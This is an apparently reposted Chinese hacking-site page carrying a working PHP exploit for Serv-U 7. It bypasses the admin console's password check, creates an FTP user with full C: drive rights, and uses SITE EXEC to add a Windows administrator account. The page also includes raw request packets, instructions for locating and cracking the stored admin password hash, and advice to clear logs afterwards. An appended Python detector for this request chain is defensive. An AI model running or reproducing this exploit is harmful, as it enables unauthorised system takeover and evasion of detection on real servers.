MYHACK58:62200923871
Jul 13, 2009 - 12:00 a.m.

Serv-U 7 local exp: local overflow privilege escalation (vulnerability warning, the black bar safety net)

Source: www.myhack58.com

<?
/*
serv-u 7 local exp ver 1.0
www.inbreak.net
author [email protected] 2008-11-19
modify 2008-11-20

The following are the main packets, for everyone to study. If you rewrite this in ASP or another language you can use them as a reference.
Global user list:
GET /Admin/XML/OrganizationUsers.xml&ID=161&sync=1227078625078&ForceList=1 HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://127.0.0.1:43958/Admin/ServerUsers.htm?Page=1
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)
Host: 127.0.0.1:43958
Connection: Keep-Alive
Cookie: domainid=3841; domainodbc=0; SULang=zh,CN; domainname=g; homelinktip=false; killmenothing; Session=bbd30833f99ff4a5e8d4d7849358ef196ad7a83539d7cf25fcd0b097930494fbfe8d25787a8544280754581406246bf8

Global permission on c:/ (RWADNELCRNI):
POST /Admin/XML/Result.xml?Command=AddObject&Object=CServer.0.DirAccess&Sync=1227081261640 HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://127.0.0.1:43958/Admin/ServerDir.htm?Page=1
User-Agent: Serv-U
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
Host: 127.0.0.1:43958
Content-Length: 67
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: domainid=3841; domainodbc=0; SULang=zh,CN; domainname=g; homelinktip=false; killmenothing; Session=bbd30833f99ff4a5e8d4d7849358ef196ad7a83539d7cf25fcd0b097930494fbfe8d25787a8544280754581406246bf8

Access=7999&MaxSize=0&Dir=%2Fc%3A&undefined=undefined&MaxSizeDisp=&

This user's permission on c:/ (RWADNELCRNI):
POST /Admin/XML/Result.xml?Command=AddObject&Object=CUser.618060.DirAccess&Sync=1227081437828 HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://127.0.0.1:43958/Admin/ServerUsers.htm?Page=1
User-Agent: Serv-U
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
Host: 127.0.0.1:43958
Content-Length: 67
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: domainid=3841; domainodbc=0; SULang=zh,CN; domainname=g; homelinktip=false; killmenothing; Session=bbd30833f99ff4a5e8d4d7849358ef196ad7a83539d7cf25fcd0b097930494fbfe8d25787a8544280754581406246bf8

Access=7999&MaxSize=0&Dir=%2Fc%3A&undefined=undefined&MaxSizeDisp=&

------------------------------Deficiencies---------------
I look forward to everyone polishing this tool.
Setting up the environment for Serv-U involves too much; please fill in the … here.

*/
?>
<html>
<title>Serv-u 7 local exp ver 1.0 by kxlzx</title>
<body>
<script>
function fun_showDiv(show)
{
document.getElementById(show).style.display="block";
}
</script>
<b>Serv-u 7 local exp ver 1.0 by kxlzx</b>
<form id="form1" name="form1" method="post" action="?">
<p><a href="#" onclick="fun_showDiv('adminpassdiv')">admin password</a>
<input type="text" name="admin_pwd" value="" />
</p>
<p>Escalate privileges directly!
<input type="submit" name="cmd" value="right" />
<a href="#" onclick="fun_showDiv('QAdiv')">QA</a>
</p>
<pre>

<?

//Global var
$port=43958;
$host="127.0.0.1";
$sessionid="";
$getuserid="";
$ftpport=21;
$ftpuser="kxlzx_hacked";
$ftppwd=$_POST['admin_pwd'];
$exec_addUser="site exec c:/windows/system32/net.exe user ".$ftpuser." ".$ftppwd." /add";
$exec_addGroup="site exec c:/windows/system32/net.exe localgroup administrators ".$ftpuser." /add";

if(isset($_POST['cmd'])) {

//login-----------------------------------------
$sock_login = fsockopen($host, $port);
$URL='/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543';
$post_data_login['user'] = "";
$post_data_login['pword'] = $ftppwd;
$post_data_login['language'] = "zh%2CCN&";
$ref="http://".$host.":".$port."/?Session=39893&Language=zh,CN&LocalAdmin=1";
$postStr = createRequest($port,$host,$URL,$post_data_login,$sessionid,$ref);
fputs($sock_login, $postStr);
$result = fread($sock_login, 1280);
$sessionid = getmidstr("<sessionid>","</sessionid>",$result);
if ($sessionid!="")
echo "login successful!\r\n";
fclose($sock_login);//login-----------------------------------------

//getOrganizationId-------------------------------
$OrganizationId="";
$sock_OrganizationId = fsockopen($host, $port);
$URL='/Admin/ServerUsers.htm?Page=1';
$postStr = createRequest($port,$host,$URL,"",$sessionid,"");
fputs($sock_OrganizationId, $postStr);
$resultOrganizationId="";
while(!feof($sock_OrganizationId)) {
$result = fread($sock_OrganizationId, 1024);
$resultOrganizationId=$resultOrganizationId.$result;
}
$strTmp = "OrganizationUsers.xml&ID=";
$OrganizationId = substr($resultOrganizationId,strpos($resultOrganizationId,$strTmp)+strlen($strTmp),strlen($strTmp)+15);
$OrganizationId = substr($OrganizationId,0,strpos($OrganizationId,'"'));
fclose($sock_OrganizationId);
if ($OrganizationId!="")
echo "get OrganizationId ".$OrganizationId." Success!\r\n";
//getOrganizationId-------------------------------

//getuserid---------------------------------------
$getuserid="";
$sock_getuserid = fsockopen($host, $port);
$URL="/Admin/XML/User.xml?Command=AddObject&Object=COrganization.".$OrganizationId.".User&Temp=1&Sync=546666666666666663";
$ref="http://".$host.":".$port."/Admin/ServerUsers.htm?Page=1";
$post_data_getuserid="";
$postStr = createRequest($port,$host,$URL,$post_data_getuserid,$sessionid,$ref);
fputs($sock_getuserid, $postStr);
$result = fread($sock_getuserid, 1280);
$result = getmidstr('<var name="ObjectID" val="','" />',$result);
fclose($sock_getuserid);
$getuserid = $result;
if ($getuserid!="")
echo "get user ID ".$getuserid." Success!\r\n";
//getuserid---------------------------------------

//adduser-----------------------------------------
$sock_adduser = fsockopen($host, $port);
$URL="/Admin/XML/Result.xml?Command=UpdateObject&Object=COrganization.".$OrganizationId.".User.".$getuserid."&Sync=1227071190250";
$post_data_adduser['LoginID'] = $ftpuser;
$post_data_adduser['FullName'] = "";
$post_data_adduser['Password'] = '!';
$post_data_adduser['ComboPasswordType'] = "%E5%B8%B8%E8%A7%84%E5%AF%86%E7%A0%81";
$post_data_adduser['PasswordType'] = "0";
$post_data_adduser['ComboAdminType'] = "%E6%97%A0%E6%9D%83%E9%99%90";
$post_data_adduser['AdminType'] = "";
$post_data_adduser['ComboHomeDir'] = "/c:";
$post_data_adduser['HomeDir'] = "/c:";
$post_data_adduser['ComboType'] = "%E6%B0%B8%E4%B9%85%E5%B8%90%E6%88%B7";
$post_data_adduser['Type'] = "0";
$post_data_adduser['ExpiresOn'] = "0";
$post_data_adduser['ComboWebClientStartupMode'] = "%E6%8F%90%E7%A4%BA%E7%94%A8%E6%88%B7%E4%BD%BF%E7%94%A8%E4%BD%95%E7%A7%8D%E5%AE%A2%E6%88%B7%E7%AB%AF";
$post_data_adduser['WebClientStartupMode'] = "";
$post_data_adduser['LockInHomeDir'] = "0";
$post_data_adduser['Enabled'] = "1";
$post_data_adduser['AlwaysAllowLogin'] = "1";
$post_data_adduser['Description'] = "";
$post_data_adduser['IncludeRespCodesInMsgFiles'] = "";
$post_data_adduser['ComboSignOnMessageFilePath'] = "";
$post_data_adduser['SignOnMessageFilePath'] = "";
$post_data_adduser['SignOnMessage'] = "";
$post_data_adduser['SignOnMessageText'] = "";
$post_data_adduser['ComboLimitType'] = "%E8%BF%9E%E6%8E%A5";
$post_data_adduser['LimitType'] = "Connection";
$post_data_adduser['QuotaBytes'] = "0";
$post_data_adduser['Quota'] = "0";
$post_data_adduser['Access'] = "7999";
$post_data_adduser['MaxSize'] = "0";
$post_data_adduser['Dir'] = "%25HOME%25";
$postStr = createRequest($port,$host,$URL,$post_data_adduser,$sessionid,"http://127.0.0.1".":".$port."/Admin/ServerUsers.htm?Page=1");
fputs($sock_adduser, $postStr,strlen($postStr));
$result = fread($sock_adduser, 1280);
fclose($sock_adduser);
echo "Add User success!\r\n";
//adduser-----------------------------------------

//addpower-----------------------------------------
$sock_addpower = fsockopen($host, $port);
$URL="/Admin/XML/Result.xml?Command=AddObject&Object=CUser.".$getuserid.".DirAccess&Sync=1227081437828";
$post_data_addpower['Access'] = "7999";
$post_data_addpower['MaxSize'] = "0";
$post_data_addpower['Dir'] = "/c:";
$post_data_addpower['undefined'] = "undefined";
$postStr = createRequest($port,$host,$URL,$post_data_addpower,$sessionid,"http://127.0.0.1".":".$port."/Admin/ServerUsers.htm?Page=1");
fputs($sock_addpower, $postStr,strlen($postStr));
$result = fread($sock_addpower, 1280);
fclose($sock_addpower);
echo "add the permissions success!\r\n";

//addpower-----------------------------------------

//exec-------------------------------
// PHP no longer accepts call-time pass-by-reference (&$errno); plain variables are passed here
$sock_exec = fsockopen("127.0.0.1", $ftpport, $errno, $errstr, 10);
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = "USER ".$ftpuser."\r\n";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);

// the user was created above with the password '!'
$sendbuf = "PASS !\r\n";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);

$sendbuf = $exec_addUser."\r\n";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fread($sock_exec, 1024);
echo "executing ".$exec_addUser."\r\n return $recvbuf\r\n";

$sendbuf = $exec_addGroup."\r\n";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fread($sock_exec, 1024);

echo "executing ".$exec_addGroup."\r\n return $recvbuf\r\n";
fclose($sock_exec);
echo "well, your 3389 is up; clean up the FTP user and the logs right now!\r\n";
//exec-------------------------------

}

/** function createRequest
@author : kxlzx 2008-11-19
@port_post : administrator port $port=43958;
@host_post : host $host="127.0.0.1";
@URL_post : target $URL='/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543';
@post_data_post : array $post_data['user'] = "";…
@return httprequest string
*/
function createRequest($port_post,$host_post,$URL_post,$post_data_post,$sessionid,$referer){
$data_string="";
if ($post_data_post!="")
{
foreach($post_data_post as $key=>$value)
{
$values[]="$key=".urlencode($value);
}
$data_string=implode("&",$values);
}
$request="";
$request.="POST ".$URL_post." HTTP/1.1\r\n";
$request.="Host: ".$host_post."\r\n";
$request.="Referer: ".$referer."\r\n";
$request.="Content-type: application/x-www-form-urlencoded\r\n";
$request.="Content-length: ".strlen($data_string)."\r\n";
$request.="User-Agent: Serv-U\r\n";
$request.="x-user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)\r\n";
$request.="Accept: */*\r\n";
$request.="Cache-Control: no-cache\r\n";
$request.="UA-CPU: x86\r\n";

if ($sessionid!="")
{
$request.="Cookie: Session=".$sessionid."\r\n";
}
$request.="\r\n";
$request.=$data_string."\r\n";

return $request;
}

//getmidstr: copied from the internet; returns the text between $L and $R in $str
function getmidstr($L,$R,$str)
{
$int_l=strpos($str,$L);
$int_r=strpos($str,$R);
// strpos returns false (not -1) when the marker is absent, so compare with !==
if ($int_l!==false && $int_r!==false)
{
$str_put=substr($str,$int_l+strlen($L),($int_r-$int_l-strlen($L)));
return $str_put;
}
else
return "did not find the required variables, please contact [email protected]";
}
?>
</pre>
</form>
<div id="adminpassdiv" style="display:none">
<pre>
The default is empty; if the password is empty, <b>fill in anything.</b>
If it has been changed, the administrator password is stored by default in:
<b>C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain\.Archive</b>
Find the MD5 password value in that file.
C:\Program Files\RhinoSoft.com\Serv-U
is the Serv-U root directory.
The password value looks like this (assuming the password is 123456):
kx#######################
The # characters stand for the 32-character MD5 hash of 123456, and kx is the two random characters that Serv-U's modified MD5 scheme adds in front.
After cracking, the result is <b>kx</b>123456; remove the kx and the rest is the password.
You can generate a dictionary for this encryption scheme.

author: kxlzx www.inbreak.net
</pre>
</div>
<div id="QAdiv" style="display:none">
<pre>
<b>I. How many ways are there to escalate privileges on Serv-U 7?</b>
There are two ways to get past Serv-U 7.
1) Log in to the administrator console page
==> get the OrganizationId used to add a user
==> get the "next new user ID" for a global user
==> add a user
==> add permissions for the user, or add a global user permission
==> log in as that user
==> execute a system command to add a system account.
2) Log in to the administrator console page
==> the basic web client
==> go to the Serv-U directory -- users -- global user directory
==> upload a user file you have defined yourself
==> log in as that user
==> execute a system command to add a system account
This document uses the <b>first</b> method.
<b>II. What is the principle behind the escalation?</b>
The Serv-U 7 management platform is HTTP-based, which is very advanced.
Capturing and analysing the traffic shows the following exploitable points:
1. When the administrator opens the web page from the management console, no password check is required.
2. If the administrator opens the web page by URL, a password is requested, but whatever is entered is accepted: "/?Session=39893&Language=zh,CN&LocalAdmin=1"
3. The administrator can add two kinds of user: global users and domain users. Permissions are likewise set in two places: globally, or per user.
4. The packet that adds the user and the packet that sets its permissions are separate.
So I can capture them and convert them into PHP socket POSTs.
Finally, log in over classic FTP and run exec commands to escalate.
While writing the PHP I ran into many problems, such as not knowing how to use functions, etc. -_-! I have never learned PHP; thanks to "Yunshu" for helping.
Analysing the packet flow showed some characteristics: the server returns all data in XML, and the data transmission is designed in a very classic way.
Serv-U 7 also has its own database, and it generates its own IDs.
This ID is random: when you create a user, the client first asks the server to generate one, and once it is generated, POSTs to modify that ID's user name, password and so on.
It is like an INSERT in Oracle.

Writing the tool ran into a lot of trouble, the biggest being this ID problem, which was analysed later.
Adding permissions can also make use of this ID.
So the tool connects to the server 6 times in total:
1. Log in to the platform, using the page address that accepts any password. This returns a sessionid, which all later packets use.
2. Get the OrganizationId used to add a user.
3. Request a user ID.
4. Modify that ID's login name and password.
5. Modify that ID's permissions, adding write, delete, execute and so on for the C drive.
6. This connection does the dirty work: log in as the user just added and execute the system commands.
<b>III. Why does it display success, but nothing comes up?</b>
That depends on the error code; here I am rather ashamed that I did not write detailed error-code checking.
Generally it is one of the following situations:
1. The administrator password may be wrong.
   See the section on the administrator password.
2. The administrator may have restricted execution of SITE EXEC.
   The program would need modifying; a function could be added so that he cannot restrict it.
3. It may be a program bug.
<b>IV. Why doesn't the author fix so many known shortcomings?</b>
Don't you see? Once a thing is done to perfection, a comparatively systematic defence program comes out.
If it is imperfect and he thinks we only have this one technique, the defence scheme will also think so.
If you don't believe it, after a while a defence scheme will come out, and there will certainly be one: "modify site exec so it cannot be accessed."
When that time comes, I'll write a function to change this thing back.
So, whenever everyone escalates to XXXX, I'll solve the XXXX problem. Everyone play with it like this first. :)

author: kxlzx www.inbreak.net

</pre>
</div>
</body>
</html>
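As an added example (my own code, not part of the original exploit and not Serv-U's), the following Python classifies captured requests to the Serv-U 7 admin console into the steps of the six-connection flow described in QA II and reports when the whole chain (login, reserve a user ID, create the user, grant full rights on C:) appears in order. The sample requests are constructed from the packets listed at the top of the page; the object IDs, Sync values and the way the localhost traffic is captured are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed sample capture (method, request-target, body), modelled on the
# packets shown on this page; the admin console listens on 127.0.0.1:43958.
SAMPLE_REQUESTS = [
    ("POST", "/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543",
     "user=&pword=x&language=zh%2CCN"),
    ("GET", "/Admin/ServerUsers.htm?Page=1", ""),
    ("POST", "/Admin/XML/User.xml?Command=AddObject&Object=COrganization.161.User&Temp=1&Sync=5", ""),
    ("POST", "/Admin/XML/Result.xml?Command=UpdateObject&Object=COrganization.161.User.618060&Sync=6",
     "LoginID=kxlzx_hacked&Password=!&HomeDir=%2Fc%3A&Access=7999&Dir=%25HOME%25"),
    ("POST", "/Admin/XML/Result.xml?Command=AddObject&Object=CUser.618060.DirAccess&Sync=7",
     "Access=7999&MaxSize=0&Dir=%2Fc%3A&undefined=undefined&MaxSizeDisp=&"),
]

# The chain, in the order the write-up's tool performs it.
CHAIN = ["login", "reserve_user_id", "create_user", "grant_full_c_drive"]

def classify(method, target, body):
    """Map one admin-console request to a step of the chain, or None."""
    path, _, qs = target.partition("?")
    q = {k: v[0] for k, v in parse_qs(qs).items()}
    form = {k: v[0] for k, v in parse_qs(body).items()}
    cmd, obj = q.get("Command"), q.get("Object", "")
    if path.endswith("/Login.xml") and cmd == "Login":
        return "login"
    if cmd == "AddObject" and q.get("Temp") == "1" \
            and re.fullmatch(r"COrganization\.\d+\.User", obj):
        return "reserve_user_id"          # server hands out the next user ID
    if cmd == "UpdateObject" and "LoginID" in form \
            and re.fullmatch(r"COrganization\.\d+\.User\.\d+", obj):
        return "create_user"              # fills in name/password on that ID
    if cmd == "AddObject" and re.fullmatch(r"C(User\.\d+|Server\.0)\.DirAccess", obj) \
            and form.get("Access") == "7999" and form.get("Dir", "").lower() == "/c:":
        return "grant_full_c_drive"       # Access=7999 on /c: = all rights on the drive
    return None

def find_escalation_chain(requests):
    """Return (matched steps in order, True if the whole chain occurs in order)."""
    steps = [s for s in (classify(*r) for r in requests) if s]
    it = iter(steps)
    complete = all(any(seen == want for seen in it) for want in CHAIN)
    return steps, complete
```

A partial match (for example only the login and the user creation) is still worth alerting on, since the console normally only sees this traffic from the administrator's own browser session.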